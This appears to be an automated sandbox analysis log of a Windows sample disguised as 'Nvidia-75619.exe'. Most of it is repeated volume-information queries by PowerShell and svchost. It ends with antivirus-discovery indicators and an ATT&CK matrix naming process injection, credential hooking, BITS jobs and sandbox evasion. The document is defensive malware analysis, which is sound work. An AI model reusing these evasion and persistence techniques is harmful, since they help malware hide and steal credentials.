Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetSecurity\Microsoft.Windows.Firewall.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeQueries volume information: C:\ VolumeInformation
Source: Nvidia-75619.exe, 00000009.00000003.3098974236.0000000001662000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %\Windows Defender\MsMpeng.exe
Source: Nvidia-75619.exe, 00000009.00000003.3098974236.0000000001662000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Nvidia-75619\Nvidia-75619.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
1
Credential API Hooking
1
File and Directory Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter
1
BITS Jobs
11
Process Injection
1
Deobfuscate/Decode Files or Information
LSASS Memory121
System Information Discovery
Remote Desktop Protocol1
Credential API Hooking
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts4
PowerShell
2
Registry Run Keys / Startup Folder
2
Registry Run Keys / Startup Folder
1
Obfuscated Files or Information
Security Account Manager231
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
Services File Permissions Weakness
1
Services File Permissions Weakness
1
Software Packing
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets41
Virtualization/Sandbox Evasion
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Masquerading
Cached Domain Credentials1
Application Window Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
Virtualization/Sandbox Evasion
